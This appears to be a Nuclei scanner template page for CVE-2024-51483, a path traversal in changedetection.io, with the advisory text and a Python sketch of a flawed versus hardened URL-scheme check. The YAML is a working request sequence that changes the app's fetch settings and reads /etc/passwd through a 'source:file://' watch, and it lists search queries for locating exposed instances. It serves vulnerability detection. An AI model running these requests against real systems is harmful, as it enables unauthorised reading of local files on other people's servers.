Changedetection.io <= 0.47.4 - Path Traversal
ID: CVE-2024-51483
Severity: medium
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,changedetection,lfi
Description
changedetection.io is free, open source web page change detection software. Prior to version 0.47.5, when a WebDriver is used to fetch files, `source:file:///etc/passwd` can be used to retrieve local system files, where the more traditional `file:///etc/passwd` gets blocked. Version 0.47.5 fixes the issue.
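The class of bug described above, as an added example that is not changedetection.io's own code: a scheme check that only inspects the raw URL string misses a `file:` target wrapped in the `source:` prefix, while a check that unwraps the prefix first and then applies a scheme allowlist rejects it. The function names, the allowlist and the sample URLs are assumptions made for illustration.

```python
from urllib.parse import urlsplit

SOURCE_PREFIX = "source:"            # wrapper prefix named in the description
ALLOWED_SCHEMES = {"http", "https"}  # assumed allowlist for this sketch


def naive_is_blocked(url: str) -> bool:
    """Flawed check: only looks at how the raw string starts."""
    return url.strip().lower().startswith("file:")


def unwrap(url: str) -> str:
    """Strip whitespace and every leading 'source:' wrapper, case-insensitively."""
    url = url.strip()
    while url.lower().startswith(SOURCE_PREFIX):
        url = url[len(SOURCE_PREFIX):].lstrip()
    return url


def hardened_is_allowed(url: str) -> bool:
    """Validate the URL that will actually be fetched, against an allowlist."""
    target = unwrap(url)
    try:
        parts = urlsplit(target)
    except ValueError:  # malformed URL: reject rather than guess
        return False
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)


# Constructed sample inputs (not taken from any real deployment).
SAMPLES = [
    "https://example.com/page",
    "source:https://example.com/page",
    "file:///etc/passwd",
    "source:file:///etc/passwd",
    "  SOURCE:File:///etc/passwd",
    "source:source:file:///etc/passwd",
]


def report():
    """Return (url, naive_blocked, hardened_allowed) for each sample."""
    return [(u, naive_is_blocked(u), hardened_is_allowed(u)) for u in SAMPLES]


if __name__ == "__main__":
    for url, blocked, allowed in report():
        print(f"{url!r:45} naive_blocked={blocked!s:5} hardened_allowed={allowed}")
```

The naive check reports the wrapped `file:` URLs as not blocked, while the hardened check rejects every `file:` variant and still accepts the `source:https://` form.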
YAML Source
id: CVE-2024-51483

info:
  name: Changedetection.io <= 0.47.4 - Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    changedetection.io is free, open source web page change detection software. Prior to version 0.47.5, when a WebDriver is used to fetch files, `source:file:///etc/passwd` can be used to retrieve local system files, where the more traditional `file:///etc/passwd` gets blocked. Version 0.47.5 fixes the issue.
  reference:
    - https://github.com/advisories/GHSA-cwgg-57xj-g77r
    - https://github.com/dgtlmoon/changedetection.io/blob/master/changedetectionio/model/Watch.py#L19
    - https://github.com/dgtlmoon/changedetection.io/blob/master/changedetectionio/processors/__init__.py#L35
    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-cwgg-57xj-g77r
    - https://github.com/user-attachments/files/17591630/CL-ChangeDetection.io.Path.Travsersal-311024-181039.pdf
  classification:
    cve-id: CVE-2024-51483
    cwe-id: CWE-22
    epss-score: 0.00065
    epss-percentile: 0.3006
    cpe: cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: changedetection
    product: changedetection
    shodan-query: http.title:"change detection"
    fofa-query: title="change detection"
    google-query: intitle:"change detection"
  tags: cve,cve2024,changedetection,lfi

http:
  - raw:
      - |
        GET /settings HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf
        part: body
        group: 1
        regex:
          - 'name="csrf_token" value="(.*)?"'
        internal: true

  - raw:
      - |
        POST /settings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_token={{csrf}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-rss_hide_muted_watches=y&application-pager_size=50&application-notification_urls=&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-base_url=&application-fetch_backend=html_webdriver&application-webdriver_delay=&requests-default_ua-html_requests=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F87.0.4280.66+Safari%2F537.36&requests-default_ua-html_webdriver=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&requests-extra_browsers-0-browser_name=&requests-extra_browsers-0-browser_connection_url=&requests-extra_browsers-1-browser_name=&requests-extra_browsers-1-browser_connection_url=&requests-extra_browsers-2-browser_name=&requests-extra_browsers-2-browser_connection_url=&requests-extra_browsers-3-browser_name=&requests-extra_browsers-3-browser_connection_url=&requests-extra_browsers-4-browser_name=&requests-extra_browsers-4-browser_connection_url=&save_button=Save

    skip-variables-check: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf2
        part: body
        group: 1
        regex:
          - 'name="csrf_token" value="(.*)?"'
        internal: true

  - raw:
      - |
        POST /form/add/quickwatch HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_token={{csrf2}}&url=source%3Afile%3A%2F%2Fetc%2Fpasswd&tags=&watch_submit_button=Watch&processor=text_json_diff

    matchers:
      - type: dsl
        dsl:
          - "status_code==302"
        internal: true

  - raw:
      - |
        GET /?{{wait_for(9)}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: uuid
        part: body
        group: 1
        regex:
          - '/etc/passwd"><\/a>\n.*?uuid=(.*?)"'
        internal: true

  - raw:
      - |
        GET /preview/{{uuid}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body,'root:x:0')"
          - "contains(content_type,'text/html')"
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022044f4e0a72bb76a68680ca9590942d6ad5831400689e08a5782c6a32c9b22d4fc022100ee37c70b55ef0525ab4c7381ff4b2d21c467a25168ef664081955e46a6bc49ef:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-51483.yaml"